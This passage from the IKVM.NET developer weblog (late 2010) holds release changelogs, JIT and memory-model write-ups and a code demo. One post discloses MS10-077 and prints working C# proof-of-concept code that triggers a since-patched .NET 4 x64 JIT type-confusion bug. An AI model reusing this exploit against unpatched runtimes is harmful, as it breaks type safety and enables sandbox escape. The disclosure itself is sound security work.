# Wednesday, 01 December 2010
New Development Snapshot

Several bug fixes. I also figured out a way to work around an annoying .NET 4 x64 JIT bug without any significant performance impact. Marek Safar has started porting gmcs to IKVM.Reflection, and that triggered some IKVM.Reflection bug fixes and improvements.

  • Fixed regression in Throwable.printStackTrace(). Exception cause in stack trace should use Throwable.toString() not System.Exception.ToString().
  • Add support for serializing .NET exceptions in Java. We don't serialize the actual object, but a placeholder instead, to avoid having to implement full .NET serialization interop.
  • File.lastModified() should return 0 for non-existing files. Fix for #3111432. Thanks to Stephen White for the patch.
  • Added workaround for .NET 4 x64 JIT bug.
  • Optimized thread creation.
  • Optimized ProtectionDomains created for .NET assemblies to be more lazy.
  • Made assembly Java class loader construction lazy.
  • Removed trace messages that don't add much value but do cause the tracer to needlessly read configuration data early in initialization.
  • Fixed AccessController.doPrivileged() bug that caused context to be ignored.
  • Removed implementation specific methods from top of stack trace for threads started from Java.
  • UnauthorizedAccessException caused by already existing file or directory should cause createFileExclusively() to return false instead of throwing an exception.
  • File.canWrite() should always return true for directories (on Windows).
  • Fixed regression. Don't call GetIPv6Properties() if IPv6 isn't available.
  • AWT fixes.
  • IKVM.Reflection: Added IKVM.Reflection.Missing type. Thanks to Marek Safar for pointing this out.
  • IKVM.Reflection: Fixed ParameterInfo.RawDefaultValue to return Missing.Value if the parameter is optional but doesn't have a default, and to return null if the parameter isn't optional (and doesn't have a default).
  • IKVM.Reflection: Added AssemblyBuilder.__DefineIconResource() API.
  • Added -win32icon:<file> option to ikvmc.
  • IKVM.Reflection: Added ModuleBuilder.__Save() to support -target:module option better.
  • Changed ikvmc to use new ModuleBuilder.__Save() instead of workaround of deleting the manifest module after saving the assembly.
  • Added support for assembly custom attributes in combination with -target:module.
  • IKVM.Reflection: Added AssemblyBuilder.__AddModule() to allow pre-existing modules to be linked in.
  • IKVM.Reflection: Fixed RawModule.GetReferencedAssemblies() to work for non-manifest modules as well.
  • IKVM.Reflection: Added API to query placeholder assembly custom attributes in a module.
  • Fixed Thread.stop() race condition.
  • Implemented java.awt.Font.createFont().
  • Fixed .NET 4 security attribute regressions.
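
The two java.io.File fixes in the list above restore behavior that the Java API documents. As a minimal sketch of that contract (the class name, method names and temp file names below are made up for illustration and are not part of IKVM):

```java
import java.io.File;
import java.io.IOException;
import java.io.UncheckedIOException;
import java.nio.file.Files;

// Hypothetical helper class, only meant to illustrate the documented java.io.File contract.
class FileSemanticsSketch {
    // lastModified() is documented to return 0L when the file does not exist.
    static long lastModifiedOfMissingFile() {
        File missing = new File(System.getProperty("java.io.tmpdir"),
                "ikvm-sketch-missing-" + System.nanoTime());
        return missing.lastModified();
    }

    // createNewFile() returns true when it created the file and false when
    // the file already existed; it should not throw for the second case.
    static boolean[] createTwice() {
        try {
            File dir = Files.createTempDirectory("ikvm-sketch").toFile();
            File file = new File(dir, "exclusive.tmp");
            boolean first = file.createNewFile();
            boolean second = file.createNewFile();
            file.delete();
            dir.delete();
            return new boolean[] { first, second };
        } catch (IOException e) {
            throw new UncheckedIOException(e);
        }
    }

    public static void main(String[] args) {
        System.out.println("lastModified of missing file: " + lastModifiedOfMissingFile());
        boolean[] created = createTwice();
        System.out.println("first create: " + created[0] + ", second create: " + created[1]);
    }
}
```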

Binaries available here: ikvmbin-0.45.3987.zip

Wednesday, 01 December 2010 09:46:41 (W. Europe Standard Time, UTC+01:00)
# Sunday, 21 November 2010
How to Detect if a Method is Overridden

Suppose you want to know if (the class of) a particular object overrides a virtual method. For an example of this see OpenJDK's Thread.isCCLOverridden() (line 1573).

In Java the obvious way to do this would be to use reflection. On the CLR there is another way that is both more accurate [1] and more efficient.
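
For comparison, the reflection-based approach could look roughly like the sketch below. This is not the OpenJDK code; the class and helper names are hypothetical, and it only handles public methods because it relies on Class.getMethod().

```java
import java.lang.reflect.Method;

// Hypothetical helper, not the OpenJDK implementation.
class OverrideCheckSketch {
    // Returns true if the runtime class of obj (or one of its superclasses
    // below base) declares its own version of the named public method.
    static boolean isOverridden(Object obj, Class<?> base, String name, Class<?>... params) {
        try {
            Method m = obj.getClass().getMethod(name, params);
            return m.getDeclaringClass() != base;
        } catch (NoSuchMethodException e) {
            throw new IllegalArgumentException(e);
        }
    }

    // Example subclass that overrides getContextClassLoader().
    static class CustomThread extends Thread {
        @Override
        public ClassLoader getContextClassLoader() {
            return null;
        }
    }

    public static void main(String[] args) {
        System.out.println(isOverridden(new Thread(), Thread.class, "getContextClassLoader"));
        System.out.println(isOverridden(new CustomThread(), Thread.class, "getContextClassLoader"));
    }
}
```

Every call goes through a method lookup by name, which is the kind of cold-path work the CLR approach avoids.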

Here's the MSIL method from IKVM's java.lang.Thread.isCCLOverridden() implementation:

.method private hidebysig static bool isCCLOverridden(class java.lang.Thread A_0) cil managed
{
  ldftn      instance class java.lang.ClassLoader java.lang.Thread::getContextClassLoader()
  ldarg.0
  ldvirtftn  instance class java.lang.ClassLoader java.lang.Thread::getContextClassLoader()
  ceq
  ldftn      instance void java.lang.Thread::setContextClassLoader(class java.lang.ClassLoader)
  ldarg.0
  ldvirtftn  instance void java.lang.Thread::setContextClassLoader(class java.lang.ClassLoader)
  ceq
  and
  ldc.i4.0
  ceq
  ret
}

Instead of running a zillion instructions and accessing a lot of cold data for reflection, this simply leverages the information the JIT already has about virtual methods.

Here's the x86 code this turns into:

  push        ebp 
  mov         ebp,esp 
  push        esi 
  push        ebx 
  mov         esi,ecx 
  push        258F58h 
  mov         ecx,esi 
  mov         edx,259240h 
  call        JIT_VirtualFunctionPointer
  mov         edx,25DCA0h 
  cmp         eax,edx 
  sete        bl 
  movzx       ebx,bl 
  push        2591A0h 
  mov         ecx,esi 
  mov         edx,259240h 
  call        JIT_VirtualFunctionPointer
  mov         edx,25DCB0h 
  cmp         eax,edx 
  sete        al 
  movzx       eax,al 
  and         ebx,eax 
  sete        al 
  movzx       eax,al 
  pop         ebx 
  pop         esi 
  pop         ebp 
  ret

To get an idea what JIT_VirtualFunctionPointer does, take a look at the Shared Source CLI.

On the CLR, in the common case it only executes about 40 instructions.

The downside to this method is that it only works if you have an object instance, although you could use FormatterServices.GetUninitializedObject() to create one.

Why Optimize This?

In the OpenJDK code, isCCLOverridden() is only called if a SecurityManager is installed, but I wanted to use it always to avoid calling getContextClassLoader() during thread construction, because that would trigger the system class loader to be constructed. My long term goal for IKVM is to make initialization more lazy to reduce the huge startup overhead.


[1] This method is more accurate (on the CLR) because you don't need to worry about non-virtual methods, virtual methods that are new (and hence don't override the base class virtual method), or explicit overrides that override a method but have a different name.

Update: See this article for a caveat.

Sunday, 21 November 2010 11:36:21 (W. Europe Standard Time, UTC+01:00)
# Wednesday, 17 November 2010
New Development Snapshot

Time for a new snapshot.

Changes:

  • Added support for using MethodImplAttribute as a Java annotation.
  • Fixed class name resolution for xml remapping instructions.
  • Many AWT fixes.
  • Fixed xml remapper to interpret empty sig attribute on call as zero length argument list.
  • Added memory barrier after volatile stores.
  • Added optimization to remove redundant memory barriers.
  • Changed default assembly class loader instantiation to avoid security manager check.
  • Fixed ikvm.exe -D property name parsing to accept properties with equals sign in the name.
  • Fixed JdbcOdbc provider to use Invariant Culture for Decimal/BigDecimal conversion.
  • Fixed column type mapping bugs in JdbcOdbcResultSetMetaData.
  • Fixed resource (and virtual class file) loading regression that caused loading resources from assemblies with an underscore in the name to fail.

Binaries available here: ikvmbin-0.45.3973.zip

Wednesday, 17 November 2010 09:08:33 (W. Europe Standard Time, UTC+01:00)
# Thursday, 11 November 2010
IKVM.NET 0.36 Update 3

At the request of an IKVM.NET user still stuck on .NET 1.1, the memory model fix has been backported to 0.36.

Changes:

  • Changed version to 0.36.0.14.
  • Emit a memory barrier after volatile stores.

Binaries available here: ikvmbin-0.36.0.14.zip
Sources (+ binaries): ikvm-0.36.0.14.zip

Thursday, 11 November 2010 07:09:06 (W. Europe Standard Time, UTC+01:00)
# Monday, 01 November 2010
C# Async CTP

Last week at the PDC Microsoft released a CTP of the upcoming C# (and VB.NET) async feature. When you install the Async CTP and run the code below with the current IKVM.NET release you'll see something like this:

7
Downloaded 64803 bytes
13

This means that after the async operation completed the method resumed on another thread. However, if you get the current IKVM.NET code from cvs, you'll see:

7
Downloaded 64803 bytes
7

Via the magic of SynchronizationContext the method now resumes on the AWT event thread, if the await happened on that thread.

Here's the demo:

using System;
using System.Threading;
using System.Net;
using java.awt;
using java.awt.@event;

class AsyncDemo : Frame, ActionListener
{
  AsyncDemo()
  {
    var button = new Button("Click Me");
    button.addActionListener(this);
    add(button);
    pack();
    setVisible(true);
  }

  public async void actionPerformed(ActionEvent ae)
  {
    Console.WriteLine(Thread.CurrentThread.ManagedThreadId);
    var wc = new WebClient();
    var data = await wc.DownloadDataTaskAsync("http://weblog.ikvm.net/");
    Console.WriteLine("Downloaded {0} bytes", data.Length);
    Console.WriteLine(Thread.CurrentThread.ManagedThreadId);
  }

  static void Main()
  {
    new AsyncDemo();
  }
}
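
The "resume on the thread that started the operation" idea can also be sketched in plain Java. This is only an analogy under stated assumptions: a single-threaded executor named "ui-thread" stands in for the AWT event thread, a byte array stands in for the download, and none of the names below come from IKVM or the Async CTP.

```java
import java.util.concurrent.CompletableFuture;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.TimeUnit;

// Hypothetical sketch: the continuation is posted back to the executor that
// started the work, which is roughly what a SynchronizationContext does.
class ResumeOnOriginThreadSketch {
    // Returns the thread name seen before and after the asynchronous step.
    static String[] demo() {
        ExecutorService ui = Executors.newSingleThreadExecutor(r -> new Thread(r, "ui-thread"));
        ExecutorService pool = Executors.newCachedThreadPool();
        try {
            CompletableFuture<String[]> result = new CompletableFuture<>();
            ui.execute(() -> {
                String before = Thread.currentThread().getName();
                CompletableFuture
                    .supplyAsync(() -> new byte[64803], pool) // stand-in for the download
                    .thenAcceptAsync(data -> {
                        // This part runs on the "ui" executor again.
                        String after = Thread.currentThread().getName();
                        result.complete(new String[] { before, after });
                    }, ui);
            });
            return result.get(5, TimeUnit.SECONDS);
        } catch (Exception e) {
            throw new RuntimeException(e);
        } finally {
            ui.shutdown();
            pool.shutdown();
        }
    }

    public static void main(String[] args) {
        String[] names = demo();
        System.out.println(names[0]);
        System.out.println(names[1]);
    }
}
```

Without the explicit executor argument to thenAcceptAsync(), the continuation would run on whatever thread happens to complete the future, which matches the first output shown above.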

Monday, 01 November 2010 15:57:38 (W. Europe Standard Time, UTC+01:00)
# Tuesday, 26 October 2010
How to Hack Your Own JIT Intrinsic

Yesterday I wrote about Thread.MemoryBarrier() and some of its performance characteristics. I wanted to do some benchmarking to see whether mfence really is faster than a locked memory operation, but instead of writing a microbenchmark (which I had already done) I wanted to run code that was a little bit more "real". So I came up with a hack to allow mfence to be used in managed code. Please note that this is a hack and not something you should use outside of an experimental context. The code is available here.

The code includes a microbenchmark, but not the "real" benchmark (based on LinkedBlockingQueue) that I used.

I also tested on a Pentium 4 class machine and a Core i7. On the Pentium 4 and my Core 2 Duo the mfence wins out significantly, but on the Core i7 mfence is significantly slower, oddly enough.

How the Hack Works

The MemoryBarrierHack.cs file contains two classes, __Hack__DoNotUse and Program. The __Hack__DoNotUse class contains the MemoryBarrier method and a static constructor to patch the MemoryBarrier method. The MemoryBarrier method is patched to patch the call site of its caller and replace the call with an mfence and a mov al,imm8 as a filler. This means that when you want a memory barrier, you simply call the static method and when that call executes, the first time it will act as a memory barrier (because of the locked memory operation) and also patch the call so that the next time it will be an mfence instruction.
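
To illustrate why a filler is needed, here is a sketch that simulates the patch on a plain byte array. It assumes the call site is a 5-byte x86 call rel32 (opcode E8), which is an assumption on my part and not taken from MemoryBarrierHack.cs. mfence encodes as 0F AE F0 (3 bytes) and mov al,imm8 as B0 ib (2 bytes), so together they fill the 5 bytes exactly. The class and method names are hypothetical, and real patching would of course write to executable memory instead of an array.

```java
// Hypothetical simulation of the call-site patch; it only rewrites a byte array.
class CallSitePatchSketch {
    static final int CALL_REL32_LENGTH = 5; // assumed: E8 + 32-bit displacement

    // returnOffset is the offset of the instruction after the call, i.e. what
    // the callee would see as its return address.
    static void patchCallSite(byte[] code, int returnOffset) {
        int callSite = returnOffset - CALL_REL32_LENGTH;
        if ((code[callSite] & 0xFF) != 0xE8) {
            throw new IllegalStateException("not a call rel32, refusing to patch");
        }
        // mfence
        code[callSite] = 0x0F;
        code[callSite + 1] = (byte) 0xAE;
        code[callSite + 2] = (byte) 0xF0;
        // mov al, 0 (two-byte filler so the following instructions stay aligned with the old call)
        code[callSite + 3] = (byte) 0xB0;
        code[callSite + 4] = 0x00;
    }

    public static void main(String[] args) {
        // nop; call rel32; ret
        byte[] code = { (byte) 0x90, (byte) 0xE8, 1, 2, 3, 4, (byte) 0xC3 };
        patchCallSite(code, 6);
        StringBuilder hex = new StringBuilder();
        for (byte b : code) {
            hex.append(String.format("%02X ", b));
        }
        System.out.println(hex.toString().trim());
    }
}
```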

I built a modified IKVM runtime that uses this trick and used that to benchmark the LinkedBlockingQueue. On my system it showed a performance improvement of about 7% with mfence versus .NET 4.0's MemoryBarrier intrinsic.

Tuesday, 26 October 2010 11:50:03 (W. Europe Daylight Time, UTC+02:00)
# Monday, 25 October 2010
Memory Model Fix

In last week's 0.44.0.6 update I fixed a memory model bug. In retrospect it was a pretty dumb bug, but in my defence, even the easy parts of memory models are still pretty subtle and when I started IKVM.NET both the Java and CLR memory models were not very well documented.

First of all, I should thank Staffan Ulfberg for filing an exceptionally high quality bug report.

Finding the Problem

After spending some quality time in Windbg looking at the crash dump and with the java.util.concurrent sources, I was eventually able to reproduce the problem on a single CPU quad core Xeon (but not on my Core 2 laptop). After it was reproducible I started pruning the repro to find the trouble spot and eventually found this method:

java.util.concurrent.AbstractQueuedSynchronizer.java
public final boolean release(int arg) {
  if (tryRelease(arg)) {
    Node h = head;
    if (h != null && h.waitStatus != 0)
      unparkSuccessor(h);
    return true;
  }
  return false;
}

My pruned version looked like this:

public final void release() {
  state = 0;
  Node h = head;
  if (h != null && h.waitStatus != 0)
    unparkSuccessor(h);
}

Both state and head are volatile fields. With this modified version the hang usually happened within a second, and I had also added a timeout to park so the problem could be seen repeatedly without restarting the process. After seeing this and thinking about it for a bit, I realized that if the read of head could be reordered with the write of state, that could cause the observed hang. To test that theory, I used Windbg to patch the running code to add an sfence instruction after the state = 0 store. That did indeed make the problem go away and replacing the sfence with three nop instructions made it reappear.

Time to read up on the memory models.

Java Memory Model

For the Java memory model, the JSR 133 Cookbook is a good place to start. It has a nice table that confirms that the reordering isn't allowed in Java:

Can Reorder                     2nd operation
1st operation                   Normal Load     Volatile Load    Volatile Store
                                Normal Store    MonitorEnter     MonitorExit
Normal Load / Normal Store                                       No
Volatile Load / MonitorEnter    No              No               No
Volatile Store / MonitorExit                    No               No

The yellow box (a volatile store followed by a volatile load) clearly says No :-)

CLR Memory Model

The CLR memory model is summarized nicely in this blog post by Joe Duffy and he explicitly calls out: "With this model, the only true case where you’d truly need the strength of a full-barrier provided by Rule 4 is to prevent reordering in the case where a store is followed by a volatile load. Without the barrier, the instructions may reorder."

So that confirmed that I did indeed need to emit a memory barrier between a volatile store and a subsequent load. I modified the bytecode compiler to emit a call to Thread.MemoryBarrier() after every volatile store.

CLI Memory Model

I explicitly chose not to support the CLI memory model, because it is not very well specified and is impossible to test against. I don't know what memory model Mono implements, but I did find that Thread.MemoryBarrier() was not implemented for x86.

Thread.MemoryBarrier() Implementation Issues

I picked Thread.MemoryBarrier() for 0.44 because it was the easiest and lowest risk fix. An alternative would be to use Interlocked.Exchange() to write to a volatile field. On .NET 2.0, Thread.MemoryBarrier() is implemented as a native method that does more work than just the memory barrier: it also polls for GC and acts as a safe point. On .NET 4.0 it has been turned into a JIT intrinsic and the overhead is lower. Unfortunately, on my system, the .NET 4.0 memory barrier is still significantly slower than the HotSpot memory barrier (which uses mfence), but apparently the trade-off between mfence and a locked instruction is not trivial.

Optimization

In the 0.45 code (where there is now an MSIL optimization step), I added an optimization to remove redundant memory barriers. If multiple volatile stores are done in succession, only the last one will get a memory barrier.
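
The idea behind this optimization can be sketched as a small peephole pass. The instruction model below is hypothetical and far simpler than real MSIL (where operand loads sit between the stores), and it is not IKVM's CodeEmitter code; it only shows the rule that a barrier directly followed by another volatile store and its barrier can be dropped.

```java
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;

// Hypothetical sketch of the peephole rule, not IKVM's actual implementation.
class BarrierPeepholeSketch {
    // Simplified stand-in for an instruction stream.
    enum Op { VOLATILE_STORE, MEMORY_BARRIER, LOAD, OTHER }

    // Drops a barrier when the next two instructions are another volatile
    // store followed by its own barrier, so only the last store in a run
    // of volatile stores keeps a barrier.
    static List<Op> removeRedundantBarriers(List<Op> code) {
        List<Op> out = new ArrayList<>();
        for (int i = 0; i < code.size(); i++) {
            Op op = code.get(i);
            boolean followedByStoreAndBarrier =
                    i + 2 < code.size()
                    && code.get(i + 1) == Op.VOLATILE_STORE
                    && code.get(i + 2) == Op.MEMORY_BARRIER;
            if (op == Op.MEMORY_BARRIER && followedByStoreAndBarrier) {
                continue; // the later barrier covers this store as well
            }
            out.add(op);
        }
        return out;
    }

    public static void main(String[] args) {
        List<Op> code = Arrays.asList(
                Op.VOLATILE_STORE, Op.MEMORY_BARRIER,
                Op.VOLATILE_STORE, Op.MEMORY_BARRIER,
                Op.LOAD);
        System.out.println(removeRedundantBarriers(code));
    }
}
```

A barrier that is followed by a load is kept, because that is exactly the store-then-load case the barrier exists for.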

Testing

Finally, here's a small test that reproduces the problem (on my Core 2 laptop):

class Rendezvous extends java.util.concurrent.atomic.AtomicInteger {
  private static final int PARTIES = 2;

  public final void await() {
    if (incrementAndGet() == PARTIES) {
      compareAndSet(PARTIES, 0);
      return;
    }
    while (get() != 0) ;
  }
}

public class test {
  static volatile int p1;
  static volatile int p2;
  static volatile int r1;
  static volatile int r2;
  static final Rendezvous rv1 = new Rendezvous();
  static final Rendezvous rv2 = new Rendezvous();

  public static void main(String[] args) {
    Thread t = new Thread() {
      public void run() {
        for (; ; ) {
          p1 = 0;
          rv1.await();

          p1 = 1;
          r1 = p2;

          rv2.await();
        }
      }
    };
    t.start();

    for (int i = 0; i < 1000000; i++) {
      p2 = 0;
      rv1.await();

      p2 = 1;
      r2 = p1;

      rv2.await();

      if (r1 == 0 && r2 == 0)
        System.out.println("Oops! i = " + i);
    }

    t.stop();
  }
}

Monday, 25 October 2010 08:58:57 (W. Europe Daylight Time, UTC+02:00)
# Friday, 22 October 2010
MS10-077 Vulnerability Details

Last week Microsoft released MS10-077. Here are the details.

Coincidentally I found this vulnerability in the .NET 4.0 RC on the day that .NET 4.0 went RTM (April 12, 2010) and the next day confirmed that RTM was also affected and reported it to MSRC.

It's not really a very interesting vulnerability, just a bug in an optimization that the x64 JIT does. Here's the code to exploit it:

using System;
using System.Runtime.CompilerServices;
class Union1
{
  internal volatile int i;
  internal volatile int j;
}
class Union2
{
  internal volatile object o;
  internal volatile int[] arr;
}
class Program
{
  static Union1 union1 = new Union1();
  static Union2 union2;
  class Base
  {
    public virtual Base Get()
    {
      return null;
    }
  }
  class Derived : Base
  {
    public Union2 i;
  }
  class MyDerived : Derived
  {
    public override Base Get()
    {
      return new MyBase();
    }
  }
  class MyBase : Base
  {
    object foo = union1;
  }
  [MethodImpl(MethodImplOptions.NoInlining)]
  static void x64_JIT_Bug(Derived d)
  {
    Base b = d;
  loop:
    if (b != null)
    {
      if (b is Derived)
      {
        Oops((Derived)b);
      }
      b = b.Get();
      goto loop;
    }
  }
  static void Oops(Derived d)
  {
    union2 = d.i;
  }
  static void Main()
  {
    x64_JIT_Bug(new MyDerived());
    Console.WriteLine(union1);
    Console.WriteLine(union2);
  }
}

The bug is in x64_JIT_Bug. The "b is Derived" test and "(Derived)" cast are incorrectly optimized away.

Friday, 22 October 2010 14:02:12 (W. Europe Daylight Time, UTC+02:00)
IKVM.NET 0.44 Update 1 RC 0

Time for a refresh of 0.44 with some bug fixes.

Changes:

  • Changed version to 0.44.0.6
  • Backported various build system improvements.
  • Backported IKVM.Reflection ILGenerator exception table sorting bug fix (when running on Mono).
  • Backported Mono 2.8 mcs build workarounds.
  • Backported support for boolean, byte, char and short non-final static field constant attributes.
  • Backported core assembly detection fix.
  • Backported fix to make sure that ikvmc (and ikvmstub) can find assemblies that are part of a multi assembly (shared class loader) group (if the assembly is in the same directory as the main assembly of the group).
  • Backported fix for regression in stack trace printing of .NET (not remapped) exceptions introduced in 0.44. The .NET stack trace should not be included in the message.
  • Backported fix for ikvmc sometimes incorrectly handling InternalsVisibleToAttributes in multi assembly builds.
  • Backported fix for regression introduced with fault handlers. Exception handlers inside fault handlers could be ignored.
  • Backported fix for #3086040. Volatile stores require a memory barrier.

Binary available here: ikvmbin-0.44.0.6.zip

Sources: ikvmsrc-0.44.0.6.zip, openjdk6-b18-stripped.zip

Friday, 22 October 2010 10:25:42 (W. Europe Daylight Time, UTC+02:00)
# Friday, 15 October 2010
New Development Snapshot

Time for a new snapshot. No major theme this time, but lots of bug fixes and some new infrastructure for doing more MSIL optimizations. Volker added the Nimbus L&F.

Changes:

  • Moved local variable analysis from verifier into a separate pass.
  • Restructured method analyzer/verifier to make data flow more obvious and keep less data alive during compilation.
  • Various minor refactorings and clean up.
  • Changed workaround for gmcs inability to properly deal with two-pass compilation of mutually dependent assemblies to use reflection, because the previous workaround now also fails on Mono 2.8.
  • Fixed reflection method invocation issue: Always wrap InvocationTargetException in another InvocationTargetException, to handle the case where a method is recursively calling itself.
  • Added support for boolean, byte, char and short non-final static field constant attributes.
  • Implemented create() for ButtonPeer and LabelPeer.
  • Implemented first stab at converting suitable fault blocks into finally blocks.
  • Changed CodeEmitter to build intermediate store of MSIL code to allow post-processing optimization steps.
  • Added endfinally opcode support to xml remapper.
  • Changed xml remapper to require explicit exits in exception blocks.
  • Moved ikvmc core assembly detection to the right place, to avoid problems when a non-main assembly of the core assembly set is explicitly referenced.
  • Fix to make sure that ikvmc (and ikvmstub) can find assemblies that are part of a multi assembly (shared class loader) group (if the assembly is in the same directory as the main assembly of the group).
  • Fix a rounding problem with FontMetrics.
  • Implemented createCompatibleVolatileImage() for Nimbus.
  • Implemented Graphics.setPaint() with a LinearGradientPaint for Nimbus.
  • Added Nimbus L&F.
  • Fixed threading problem in font metrics code.
  • Fixed regression in stack trace printing of .NET (not remapped) exceptions introduced in 0.44. The .NET stack trace should not be included in the message.
  • Fixed ikvmc bug. Before saving any of the output assemblies, we should first finish all of them (because InternalsVisibleToAttributes may be added as a side effect of compiling code in another assembly).
  • Fixed regression in SocketInputStream.read(). The offset into the byte array was ignored.
  • Use rendering hints of FontMetrics for drawGlyphVector.
  • Fixed regression introduced with fault handlers. Exception handlers inside fault handlers could be ignored.
  • Added some experimental MSIL optimizations to CodeEmitter. They can be enabled by setting the IKVM_EXPERIMENTAL_OPTIMIZATIONS environment variable.
  • Added error handling for -remap file errors to ikvmc.
  • IKVM.Reflection: Fixed ILGenerator to throw a NotSupportedException if a branch offset doesn't fit (i.e. when a short form branch is used inappropriately).
  • IKVM.Reflection: Added exception message for backward branch constraints violations.
  • IKVM.Reflection: Fixed ILGenerator to properly sort exception table when running on Mono.
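
The reflection fix in the list above (always wrapping InvocationTargetException) concerns a method that reflectively calls itself. A minimal sketch of the expected Java behavior, with hypothetical class and method names: every Method.invoke() layer adds its own InvocationTargetException, even when the exception passing through is already one.

```java
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;

// Hypothetical sketch of the expected wrapping behavior.
class NestedInvocationTargetSketch {
    // Calls itself through reflection until depth reaches 0, then throws.
    public static void recurse(int depth) throws Exception {
        if (depth == 0) {
            throw new IllegalStateException("boom");
        }
        Method self = NestedInvocationTargetSketch.class.getMethod("recurse", int.class);
        self.invoke(null, depth - 1);
    }

    // Counts how many InvocationTargetException layers surround the original exception.
    static int wrapperCount(int depth) {
        try {
            Method m = NestedInvocationTargetSketch.class.getMethod("recurse", int.class);
            m.invoke(null, depth);
            return 0;
        } catch (InvocationTargetException e) {
            int count = 0;
            Throwable t = e;
            while (t instanceof InvocationTargetException) {
                count++;
                t = t.getCause();
            }
            return count;
        } catch (ReflectiveOperationException e) {
            throw new RuntimeException(e);
        }
    }

    public static void main(String[] args) {
        System.out.println(wrapperCount(2));
    }
}
```

With three reflective calls on the stack (depth 2, 1 and 0), the caller should see three nested wrappers around the IllegalStateException.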

Binaries available here: ikvmbin-0.45.3940.zip

Friday, 15 October 2010 06:32:16 (W. Europe Daylight Time, UTC+02:00)